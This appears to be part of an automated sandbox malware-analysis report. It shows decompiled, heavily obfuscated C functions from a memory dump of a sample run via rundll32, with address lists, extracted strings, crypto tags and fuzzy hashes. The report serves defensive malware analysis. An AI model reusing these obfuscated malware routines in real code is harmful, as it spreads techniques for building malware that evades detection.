					while(1) {
						_t93 =  &_v520;
						__eflags = _t113 - _t93;
						if(_t113 <= _t93) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t81 =  &_v564;
						 *_t81 = _v564 - 1;
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags = _t113;
							L14:
							_t96 = 0x10833494;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t96 - 0x87872ef;
				} while (__eflags != 0);
				return _t93;
			}

0x0029d2ce
0x0029d2d4
0x0029d2db
0x0029d2e3
0x0029d2e8
0x0029d2f0
0x0029d2f8
0x0029d300
0x0029d308
0x0029d310
0x0029d318
0x0029d320
0x0029d328
0x0029d330
0x0029d338
0x0029d340
0x0029d348
0x0029d34d
0x0029d35f
0x0029d36c
0x0029d375
0x0029d37d
0x0029d38a
0x0029d38e
0x0029d396
0x0029d39e
0x0029d3a2
0x0029d3a7
0x0029d3af
0x0029d3bc
0x0029d3c0
0x0029d3c5
0x0029d3cd
0x0029d3d5
0x0029d3dd
0x0029d3e2
0x0029d3ee
0x0029d3ee
0x0029d3f4
0x00000000
0x0029d4af
0x0029d3fc
0x0029d41f
0x0029d424
0x0029d427
0x00000000
0x0029d427
0x0029d404
0x00000000
0x00000000
0x0029d40a
0x0029d40a
0x0029d42b
0x0029d438
0x0029d440
0x0029d448
0x0029d468
0x0029d47c
0x0029d47c
0x0029d480
0x0029d482
0x00000000
0x00000000
0x0029d46d
0x0029d471
0x0029d479
0x0029d479
0x0029d479
0x00000000
0x0029d479
0x0029d473
0x0029d473
0x0029d473
0x0029d477
0x0029d486
0x0029d489
0x0029d489
0x00000000
0x0029d489
0x00000000
0x0029d477
0x00000000
0x0029d48b
0x0029d48b
0x0029d48b
0x00000000

Strings

I~-, xrefs: 0029D3FE
I~-, xrefs: 0029D2E3
., xrefs: 0029D340
*, xrefs: 0029D3D5
jr, xrefs: 0029D308

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .$I~-$I~-$jr$*
API String ID: 0-832335732
Opcode ID: d6b6a814be9d7a2c86bfd901e22dcfb3fe6844464f8df4754d9266ff5a58e273
Instruction ID: 44219f2a30165f10da739e273331db040538332e6df411e057078ba46588e2c5
Opcode Fuzzy Hash: d6b6a814be9d7a2c86bfd901e22dcfb3fe6844464f8df4754d9266ff5a58e273
Instruction Fuzzy Hash: EE4154725183428BCB58DF20D48941FBBF1FBD4398F104A1DF096A62A0D7B4AA59DF87

Uniqueness

Uniqueness Score: -1.00%

Function 002A9AE2, Relevance: 6.4, Strings: 5, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002A9AE2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t82;
				void* _t88;
				void* _t89;
				signed int _t92;
				void* _t95;
				void* _t110;
				signed int* _t113;

				_t109 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t82);
				_v76 = 0x6f8b;
				_t113 =  &(( &_v76)[6]);
				_v76 = _v76 + 0x8c5d;
				_v76 = _v76 + 0xffff4872;
				_t110 = 0;
				_v76 = _v76 >> 0xb;
				_t95 = 0x2943c3cf;
				_v76 = _v76 ^ 0x000054fb;
				_v60 = 0xbd2c;
				_t92 = 0x71;
				_v60 = _v60 / _t92;
				_v60 = _v60 + 0x1578;
				_v60 = _v60 ^ 0x00002f47;
				_v68 = 0x8069;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 | 0x74b21309;
				_v68 = _v68 ^ 0x74b275a8;
				_v52 = 0x90f2;
				_v52 = _v52 | 0xe06dbb1a;
				_v52 = _v52 ^ 0xe06d9732;
				_v56 = 0xf7b0;
				_v56 = _v56 + 0x686;
				_v56 = _v56 ^ 0xa4f8427a;
				_v56 = _v56 ^ 0xa4f8a9dc;
				_v72 = 0x7665;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0x7725359c;
				_v72 = _v72 | 0xb439d464;
				_v72 = _v72 ^ 0xf7f9d3ee;
				_v48 = 0x725a;
				_v48 = _v48 + 0xffffdb12;
				_v48 = _v48 ^ 0x000074dc;
				_v64 = 0xe8ee;
				_v64 = _v64 * 0x57;
				_v64 = _v64 >> 8;
				_v64 = _v64 + 0xffffd02c;
				_v64 = _v64 ^ 0x000002b2;
				do {
					while(_t95 != 0x1452e728) {
						if(_t95 == 0x247c0811) {
							_t89 = E002A39A9( &_v44, _v68, _v52, _v56, _t109, _v72);
							_t113 =  &(_t113[4]);
							__eflags = _t89;
							if(__eflags != 0) {
								_t95 = 0x1452e728;
								continue;
							}
						} else {
							if(_t95 == 0x2943c3cf) {
								_t95 = 0x3589722e;
								continue;
							} else {
								if(_t95 != 0x3589722e) {
									goto L10;
								} else {
									E002ACF95(_v76,  &_v44, _a12, _v60);
									_t95 = 0x247c0811;
									continue;
								}
							}
						}
						goto L11;
					}
					_t88 = E00293545( &_v44, _v48, __eflags, _v64, _t109 + 4);
					_t113 =  &(_t113[2]);
					__eflags = _t88;
					_t110 =  !=  ? 1 : _t110;
					_t95 = 0x27322b37;
					L10:
					__eflags = _t95 - 0x27322b37;
				} while (__eflags != 0);
				L11:
				return _t110;
			}

0x002a9ae9
0x002a9aed
0x002a9aee
0x002a9af2
0x002a9af6
0x002a9afa
0x002a9afb
0x002a9afc
0x002a9b01
0x002a9b09
0x002a9b0c
0x002a9b16
0x002a9b1e
0x002a9b20
0x002a9b25
0x002a9b2a
0x002a9b37
0x002a9b45
0x002a9b4d
0x002a9b51
0x002a9b59
0x002a9b61
0x002a9b69
0x002a9b6e
0x002a9b73
0x002a9b7b
0x002a9b83
0x002a9b8b
0x002a9b93
0x002a9b9b
0x002a9ba3
0x002a9bab
0x002a9bb3
0x002a9bbb
0x002a9bc3
0x002a9bc8
0x002a9bd0
0x002a9bd8
0x002a9be0
0x002a9be8
0x002a9bf0
0x002a9bf8
0x002a9c05
0x002a9c09
0x002a9c0e
0x002a9c16
0x002a9c1e
0x002a9c1e
0x002a9c28
0x002a9c6d
0x002a9c72
0x002a9c75
0x002a9c77
0x002a9c79
0x00000000
0x002a9c79
0x002a9c2a
0x002a9c30
0x002a9c54
0x00000000
0x002a9c32
0x002a9c34
0x00000000
0x002a9c36
0x002a9c46
0x002a9c4d
0x00000000
0x002a9c4d
0x002a9c34
0x002a9c30
0x00000000
0x002a9c28
0x002a9c8d
0x002a9c94
0x002a9c98
0x002a9c9a
0x002a9c9d
0x002a9ca2
0x002a9ca2
0x002a9ca2
0x002a9caf
0x002a9cb7

Strings

G/, xrefs: 002A9B59
Zr, xrefs: 002A9BE0
ev, xrefs: 002A9BBB
7+2', xrefs: 002A9CA2
7+2', xrefs: 002A9C9D

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 7+2'$7+2'$G/$Zr$ev
API String ID: 0-1708381047
Opcode ID: 8fae7c3711dcf2e79c0254c4af01d36d6b61d2da4a224a71d85ddb227a81d10d
Instruction ID: ab18f2e8672f53d3a6a9b43e1179d474d509a7c03669ea561815cd17df4d239c
Opcode Fuzzy Hash: 8fae7c3711dcf2e79c0254c4af01d36d6b61d2da4a224a71d85ddb227a81d10d
Instruction Fuzzy Hash: AE416A7110C3429FD718CE21D84941FBBE1BBD8718F104A1DF099A2260D774CA5ADF87

Uniqueness

Uniqueness Score: -1.00%

Function 002A0705, Relevance: 5.2, Strings: 4, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002A0705(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr* _t210;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t229;
				intOrPtr _t230;
				void* _t246;
				intOrPtr _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;
				signed int* _t254;

				_t225 = __ecx;
				_t253 =  &_v112;
				_v12 = 0x2ae831;
				_v8 = 0;
				_v4 = 0;
				_v64 = 0xb890;
				_v36 = 0;
				_t246 = 0x19b194f4;
				_v20 = __edx;
				_t248 = 0x12;
				_v64 = _v64 / _t248;
				_v64 = _v64 ^ 0x00004717;
				_v80 = 0xbfb4;
				_t223 = 0x63;
				_t249 = 0x11;
				_v32 = __ecx;
				_v80 = _v80 * 3;
				_v80 = _v80 + 0xffff4fa6;
				_v80 = _v80 ^ 0x0001d4bc;
				_v84 = 0xf2;
				_v84 = _v84 + 0xffff1f3a;
				_v84 = _v84 ^ 0x439a3d40;
				_v84 = _v84 ^ 0xbc6552f8;
				_v112 = 0x1620;
				_v112 = _v112 ^ 0x171f24f9;
				_v112 = _v112 * 0x49;
				_v112 = _v112 << 5;
				_v112 = _v112 ^ 0xfcaff8c9;
				_v100 = 0x5990;
				_v100 = _v100 << 1;
				_v100 = _v100 >> 2;
				_v100 = _v100 + 0xffff7bb1;
				_v100 = _v100 ^ 0xffff872a;
				_v104 = 0x2c8d;
				_v104 = _v104 + 0xffffbead;
				_v104 = _v104 ^ 0x029e02f7;
				_v104 = _v104 + 0xc7a9;
				_v104 = _v104 ^ 0xfd62d122;
				_v76 = 0x3bec;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 | 0x941fdac1;
				_v76 = _v76 ^ 0x941fd2f4;
				_v108 = 0x835;
				_v108 = _v108 << 0xd;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 * 0xe;
				_v108 = _v108 ^ 0x0000dba4;
				_v52 = 0x4734;
				_v52 = _v52 ^ 0xebb7e2e1;
				_v52 = _v52 ^ 0xebb7b9b6;
				_v56 = 0x478e;
				_v56 = _v56 / _t223;
				_v56 = _v56 ^ 0x000038f6;
				_v60 = 0xd08d;
				_v60 = _v60 | 0x4fe391dd;
				_v60 = _v60 ^ 0x4fe3b3b3;
				_v72 = 0x9241;
				_v72 = _v72 + 0xb8f8;
				_v72 = _v72 / _t249;
				_v72 = _v72 ^ 0x00000500;
				_v92 = 0x37c4;
				_v92 = _v92 ^ 0xd8204144;
				_v92 = _v92 + 0xffff01d4;
				_t252 = _v20;
				_v92 = _v92 / _t223;
				_v92 = _v92 ^ 0x022ea9b2;
				_v96 = 0x66d9;
				_t250 = _v16;
				_t224 = _v20;
				_v96 = _v96 * 0x5f;
				_v96 = _v96 + 0xdd88;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0x0270ac9a;
				_v44 = 0xa4f1;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x0002c5b1;
				_v48 = 0xbb1e;
				_v48 = _v48 * 0x4b;
				_v48 = _v48 ^ 0x003681ac;
				_v68 = 0x46e5;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 + 0x5c8f;
				_v68 = _v68 ^ 0x000063c9;
				_v88 = 0x4989;
				_v88 = _v88 + 0xffffd6e3;
				_v88 = _v88 + 0xffff2554;
				_v88 = _v88 * 0x19;
				_v88 = _v88 ^ 0xffeddfa0;
				_t205 = _v40;
				while(_t246 != 0x19b194f4) {
					if(_t246 == 0x29f04624) {
						_t247 = E002A280B(_v100,  &_v28, _t205, _t225, _v76, _t252, _v108);
						_t253 =  &(_t253[6]);
						_v36 = _t247;
						if(_t247 == 0) {
							goto L17;
						} else {
							_t229 = _v28;
							if(_t229 == 0) {
								goto L16;
							} else {
								_t205 = _v40 + _t229;
								_v40 = _v40 + _t229;
								_t252 = _t252 - _t229;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t230 = _t250 + _t250;
									_push(_t230);
									_push(_t230);
									_v24 = _t230;
									_t220 = E002A9E2B(_t230);
									_t254 =  &(_t253[3]);
									_v40 = _t220;
									if(_t220 == 0) {
										goto L16;
									} else {
										E0029689F(_v92, _t224, _t250, _t220, _v96);
										E0029EF80(_v44, _t224, _v48);
										_t224 = _v40;
										_t252 = _t250;
										_t253 =  &(_t254[4]);
										_t205 = _t224 + _t250;
										_t250 = _v24;
										_v40 = _t205;
										if(_t252 == 0) {
											goto L16;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t246 != 0x2da758ad) {
							L14:
							if(_t246 != 0x1d82698d) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t225);
							_push(_t225);
							_t205 = E002A9E2B(0x10000);
							_t224 = _t205;
							_t253 =  &(_t253[3]);
							if(_t224 == 0) {
								L15:
								_t247 = _v36;
								L16:
								if(_t247 != 0) {
									_t210 = _v20;
									 *_t210 = _t224;
									 *((intOrPtr*)(_t210 + 4)) = _t250 - _t252;
								} else {
									L17:
									E0029EF80(_v68, _t224, _v88);
								}
							} else {
								_v40 = _t205;
								_t252 = 0x10000;
								L6:
								_t225 = _v32;
								_t246 = 0x29f04624;
								continue;
							}
						}
					}
					return _t247;
				}
				_t246 = 0x2da758ad;
				goto L14;
			}

0x002a0705
0x002a0705
0x002a0708
0x002a0712
0x002a0716
0x002a071a
0x002a0726
0x002a072a
0x002a0733
0x002a073b
0x002a0740
0x002a0746
0x002a074e
0x002a075b
0x002a075e
0x002a075f
0x002a0763
0x002a0767
0x002a076f
0x002a0777
0x002a077f
0x002a0787
0x002a078f
0x002a0797
0x002a079f
0x002a07ac
0x002a07b0
0x002a07b5
0x002a07bd
0x002a07c5
0x002a07c9
0x002a07ce
0x002a07d6
0x002a07de
0x002a07e6
0x002a07ee
0x002a07f6
0x002a07fe
0x002a0806
0x002a080e
0x002a0813
0x002a081b
0x002a0823
0x002a082b
0x002a0830
0x002a083a
0x002a083e
0x002a0846
0x002a084e
0x002a0856
0x002a085e
0x002a086e
0x002a0872
0x002a087a
0x002a0882
0x002a088a
0x002a0892
0x002a089a
0x002a08a8
0x002a08ac
0x002a08b4
0x002a08bc
0x002a08c4
0x002a08d4
0x002a08d8
0x002a08dc
0x002a08e4
0x002a08f1
0x002a08f5
0x002a08f9
0x002a08fd
0x002a0905
0x002a090a
0x002a0912
0x002a091a
0x002a091f
0x002a0927
0x002a0934
0x002a0938
0x002a0940
0x002a0948
0x002a094d
0x002a0955
0x002a095d
0x002a0965
0x002a096d
0x002a097a
0x002a097e
0x002a0986
0x002a098a
0x002a099c
0x002a0a02
0x002a0a04
0x002a0a07
0x002a0a0d
0x00000000
0x002a0a13
0x002a0a13
0x002a0a19
0x00000000
0x002a0a1f
0x002a0a23
0x002a0a25
0x002a0a29
0x002a0a2b
0x00000000
0x002a0a2d
0x002a0a31
0x002a0a40
0x002a0a41
0x002a0a43
0x002a0a47
0x002a0a4c
0x002a0a4f
0x002a0a55
0x00000000
0x002a0a57
0x002a0a63
0x002a0a72
0x002a0a77
0x002a0a7b
0x002a0a7d
0x002a0a80
0x002a0a83
0x002a0a87
0x002a0a8d
0x00000000
0x002a0a8f
0x00000000
0x002a0a8f
0x002a0a8d
0x002a0a55
0x002a0a2b
0x002a0a19
0x002a099e
0x002a09a4
0x002a0a99
0x002a0a9f
0x00000000
0x00000000
0x00000000
0x00000000
0x002a09aa
0x002a09ae
0x002a09bf
0x002a09c0
0x002a09c2
0x002a09c7
0x002a09c9
0x002a09ce
0x002a0aa5
0x002a0aa5
0x002a0aa9
0x002a0aab
0x002a0abf
0x002a0ac5
0x002a0ac7
0x002a0aad
0x002a0aad
0x002a0ab7
0x002a0abc
0x002a09d4
0x002a09d4
0x002a09d8
0x002a09da
0x002a09da
0x002a09de
0x00000000
0x002a09de
0x002a09ce
0x002a09a4
0x002a0ad3
0x002a0ad3
0x002a0a94
0x00000000

Strings

1*, xrefs: 002A0708
4G, xrefs: 002A0846
;, xrefs: 002A0806
F, xrefs: 002A0940

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1*$4G$;$F
API String ID: 0-349567369
Opcode ID: c2577b7554acdc3cee4ebed99c9a0c4c11f6c6726cd678e98a4f19c7e327505a
Instruction ID: e7e725f5f2174526d91db980d5e2bf5d9828bb3d77e2457ac2f0c11e072d577f
Opcode Fuzzy Hash: c2577b7554acdc3cee4ebed99c9a0c4c11f6c6726cd678e98a4f19c7e327505a
Instruction Fuzzy Hash: 26A14DB15183428FD354CF29C58980BFBE1BBC9758F408A1EF59997260D7B5DA09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00298F55, Relevance: 5.2, Strings: 4, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00298F55(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t167;
				void* _t190;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t226;
				void* _t227;
				intOrPtr* _t228;
				signed int* _t230;

				_push(_a8);
				_t228 = __edx;
				_t200 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t167);
				_v16 = 0x774bc2;
				_t230 =  &(( &_v84)[4]);
				asm("stosd");
				_t227 = 0x26e9c20b;
				asm("stosd");
				_t202 = 0x6a;
				asm("stosd");
				_v76 = 0x1d07;
				_t226 = 0;
				_v76 = _v76 * 0x3a;
				_v76 = _v76 << 6;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x0000349d;
				_v48 = 0xbd2e;
				_v48 = _v48 / _t202;
				_t203 = 0x5b;
				_v48 = _v48 / _t203;
				_v48 = _v48 ^ 0x00000004;
				_v32 = 0xc05c;
				_t204 = 0x1c;
				_v32 = _v32 * 0x6d;
				_v32 = _v32 ^ 0x0051fdd2;
				_v72 = 0xb846;
				_v72 = _v72 + 0xffff8d9f;
				_v72 = _v72 << 5;
				_v72 = _v72 << 2;
				_v72 = _v72 ^ 0x0022a0d2;
				_v52 = 0xc4f1;
				_v52 = _v52 >> 5;
				_v52 = _v52 >> 0xf;
				_v52 = _v52 ^ 0x00001615;
				_v36 = 0x662;
				_v36 = _v36 / _t204;
				_v36 = _v36 ^ 0x00006bd3;
				_v56 = 0xbdec;
				_v56 = _v56 + 0x52e0;
				_v56 = _v56 | 0xeafe3942;
				_v56 = _v56 ^ 0xeaff29b3;
				_v60 = 0x8f85;
				_v60 = _v60 + 0xfd19;
				_v60 = _v60 << 1;
				_v60 = _v60 ^ 0x00037997;
				_v64 = 0x8933;
				_v64 = _v64 << 1;
				_t205 = 0x57;
				_v64 = _v64 * 0x34;
				_v64 = _v64 ^ 0x0037e990;
				_v80 = 0xc3e3;
				_v80 = _v80 / _t205;
				_t206 = 0x67;
				_v80 = _v80 * 0x11;
				_v80 = _v80 | 0x0e1d22b4;
				_v80 = _v80 ^ 0x0e1d13e6;
				_v84 = 0xf10b;
				_v84 = _v84 + 0x3c11;
				_v84 = _v84 / _t206;
				_t207 = 0x1b;
				_push(3);
				_v84 = _v84 * 0x58;
				_v84 = _v84 ^ 0x0001356c;
				_v40 = 0xe3da;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 | 0xfdebf044;
				_v40 = _v40 ^ 0xfdebe1b0;
				_v44 = 0x3431;
				_v44 = _v44 | 0x0acb9442;
				_v44 = _v44 + 0xa129;
				_v44 = _v44 ^ 0x0acc41a3;
				_v24 = 0xe7fb;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00004012;
				_v68 = 0x9b1;
				_v68 = _v68 << 3;
				_v68 = _v68 / _t207;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x0000034f;
				_v28 = 0x395b;
				_pop(0);
				_v28 = _v28 / 0;
				_v28 = _v28 ^ 0x00002a55;
				do {
					while(_t227 != 0x964a98b) {
						if(_t227 == 0x10c3db94) {
							_push(0);
							_push(0);
							_t226 = E002A9E2B(_v20);
							_t230 =  &(_t230[3]);
							if(_t226 != 0) {
								_t227 = 0x161ef5d3;
								continue;
							}
						} else {
							if(_t227 == 0x161ef5d3) {
								E002A1F8E(_t226, _v40, _v44, 0,  &_v20, _v24, _t200, 0, _v48, _v68, _v28);
								 *_t228 = _v20;
							} else {
								if(_t227 != 0x26e9c20b) {
									goto L11;
								} else {
									_t227 = 0x964a98b;
									continue;
								}
							}
						}
						L14:
						return _t226;
					}
					_t190 = E002A1F8E(0, _v32, _v72, 0,  &_v20, _v52, _t200, 0, _v76, _v36, _v56);
					_t230 =  &(_t230[0xa]);
					if(_t190 == 0) {
						_t227 = 0x2a29925e;
						goto L11;
					} else {
						_t227 = 0x10c3db94;
						continue;
					}
					goto L14;
					L11:
				} while (_t227 != 0x2a29925e);
				goto L14;
			}

0x00298f5c
0x00298f60
0x00298f62
0x00298f64
0x00298f68
0x00298f69
0x00298f6a
0x00298f6f
0x00298f7d
0x00298f80
0x00298f83
0x00298f8a
0x00298f8b
0x00298f8e
0x00298f8f
0x00298f97
0x00298f9e
0x00298fa2
0x00298fa7
0x00298fac
0x00298fb4
0x00298fc4
0x00298fcc
0x00298fd1
0x00298fd7
0x00298fdc
0x00298fe9
0x00298fec
0x00298ff0
0x00298ff8
0x00299000
0x00299008
0x0029900d
0x00299012
0x0029901a
0x00299022
0x00299027
0x0029902c
0x00299034
0x00299044
0x00299048
0x00299050
0x00299058
0x00299060
0x00299068
0x00299070
0x00299078
0x00299080
0x00299084
0x0029908c
0x00299094
0x0029909d
0x0029909e
0x002990a2
0x002990aa
0x002990b8
0x002990c5
0x002990c8
0x002990cc
0x002990d4
0x002990dc
0x002990e4
0x002990f4
0x002990fd
0x002990fe
0x00299100
0x00299104
0x0029910c
0x00299114
0x00299119
0x00299121
0x00299129
0x00299131
0x00299139
0x00299141
0x00299149
0x00299151
0x00299156
0x0029915e
0x00299166
0x00299173
0x00299177
0x0029917c
0x00299184
0x00299190
0x00299193
0x00299197
0x0029919f
0x0029919f
0x002991ad
0x002991da
0x002991db
0x002991e5
0x002991e7
0x002991ec
0x002991f2
0x00000000
0x002991f2
0x002991af
0x002991b5
0x00299266
0x00299272
0x002991bb
0x002991c1
0x00000000
0x002991c3
0x002991c3
0x00000000
0x002991c3
0x002991c1
0x002991b5
0x00299275
0x0029927e
0x0029927e
0x0029921b
0x00299220
0x00299225
0x00299231
0x00000000
0x00299227
0x00299227
0x00000000
0x00299227
0x00000000
0x00299236
0x00299236
0x00000000

Strings

14, xrefs: 00299129
R, xrefs: 00299058
[9, xrefs: 00299184
U*, xrefs: 00299197

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 14$U*$[9$R
API String ID: 0-1675214873
Opcode ID: 124be20d79e86725cd7f7281ffd6e3df0dbed24fafbb2ab28c8d25ffee96a8da
Instruction ID: c3de6327aadc3d7b4b55dafea3340dc61cca3236eefdfdb146091c9fc859e9f4
Opcode Fuzzy Hash: 124be20d79e86725cd7f7281ffd6e3df0dbed24fafbb2ab28c8d25ffee96a8da
Instruction Fuzzy Hash: 02814272508341AFE708CF25C98A80BFBE1FBC9758F00491DF58996260D7B6DA588F43

Uniqueness

Uniqueness Score: -1.00%

Function 0029766F, Relevance: 5.2, Strings: 4, Instructions: 169
COMMONCrypto

Download Yara Rule

C-Code - Quality: 42%

			E0029766F(intOrPtr _a4, intOrPtr _a8) {
				void* _v12;
				intOrPtr _v16;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __ecx;
				void* _t124;
				void* _t133;
				signed int _t137;
				signed int _t140;
				char _t142;
				signed int _t143;
				void* _t146;
				char* _t153;
				void* _t161;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int* _t172;

				_push(_a8);
				_push(_a4);
				_push(0x40);
				E0029E171(_t124);
				_v16 = 0x34d27;
				_v36 = 0x10;
				asm("stosd");
				_t172 =  &(( &_v88)[4]);
				_t143 = 0;
				_t146 = 0x1e95af98;
				asm("stosd");
				_t166 = 0x41;
				asm("stosd");
				_v76 = 0x8915;
				_v76 = _v76 << 1;
				_v76 = _v76 | 0x9bec6489;
				_v76 = _v76 ^ 0x9bed18bf;
				_v80 = 0xa41b;
				_v80 = _v80 / _t166;
				_t167 = 0x29;
				_v80 = _v80 / _t167;
				_v80 = _v80 ^ 0x0000505a;
				_v56 = 0x791d;
				_v56 = _v56 + 0xffffcdb6;
				_v56 = _v56 ^ 0x00007a60;
				_v68 = 0xda7;
				_v68 = _v68 << 6;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x01b4918d;
				_v72 = 0x6199;
				_v72 = _v72 + 0xd912;
				_v72 = _v72 + 0xffff7ece;
				_v72 = _v72 ^ 0x0000cfd3;
				_v64 = 0xad0b;
				_v64 = _v64 + 0xffffabf4;
				_v64 = _v64 ^ 0xee644ac2;
				_v64 = _v64 ^ 0xee647eb7;
				_v44 = 0x3f63;
				_v44 = _v44 + 0xa841;
				_v44 = _v44 ^ 0x0000e7a1;
				_v48 = 0xf613;
				_v48 = _v48 << 5;
				_v48 = _v48 ^ 0x001ec1d2;
				_v52 = 0xc2d6;
				_t168 = 0x24;
				_v52 = _v52 / _t168;
				_v52 = _v52 ^ 0x000077db;
				_v88 = 0x7cd6;
				_v88 = _v88 << 4;
				_v88 = _v88 + 0xfffffcc8;
				_v88 = _v88 >> 4;
				_v88 = _v88 ^ 0x0000340c;
				_v60 = 0x3433;
				_v60 = _v60 << 8;
				_v60 = _v60 | 0x47df43ab;
				_v60 = _v60 ^ 0x47ff574a;
				_v40 = 0xe7e9;
				_v40 = _v40 + 0xffffe492;
				_v40 = _v40 ^ 0x0000e805;
				_v84 = 0xdb36;
				_v84 = _v84 >> 2;
				_v84 = _v84 << 0xc;
				_v84 = _v84 + 0x38f;
				_v84 = _v84 ^ 0x036c82d0;
				while(_t146 != 0x1343546f) {
					if(_t146 == 0x1e95af98) {
						_t146 = 0x34c9c2df;
						continue;
					}
					if(_t146 == 0x34c9c2df) {
						_t140 = E002A4C42(_v76,  &_v36, _v80,  &_v32);
						__eflags = _t140;
						if(_t140 == 0) {
							L20:
							return _t143;
						}
						_t146 = 0x3624db55;
						continue;
					}
					if(_t146 != 0x3624db55) {
						L19:
						__eflags = _t146 - 0x20971cc1;
						if(_t146 != 0x20971cc1) {
							continue;
						}
						goto L20;
					}
					_t153 =  &_v32;
					if(_v32 == 0) {
						L14:
						_t146 = 0x1343546f;
						continue;
					} else {
						goto L6;
					}
					do {
						L6:
						_t142 =  *_t153;
						if(_t142 < 0x30 || _t142 > 0x39) {
							if(_t142 < 0x61 || _t142 > 0x7a) {
								if(_t142 < 0x41 || _t142 > 0x5a) {
									 *_t153 = 0x58;
								}
							}
						}
						_t153 = _t153 + 1;
					} while ( *_t153 != 0);
					goto L14;
				}
				_push(0x2af760);
				_push(_v72);
				_t133 = E002933F4(_v56, _v68);
				_push(E00293FAB(__eflags));
				_push( &_v32);
				_push(_v88);
				_push(_v52);
				_push(_t133);
				_push(_v48);
				_push(_a8);
				_t161 = 0x40;
				_t137 = E002962FF(_t161, __eflags);
				__eflags = _t137;
				_t123 = _t137 > 0;
				__eflags = _t123;
				_t143 = 0 | _t123;
				E0029F935(_v60, _t133, _v40, _v84);
				_t172 =  &(_t172[0xb]);
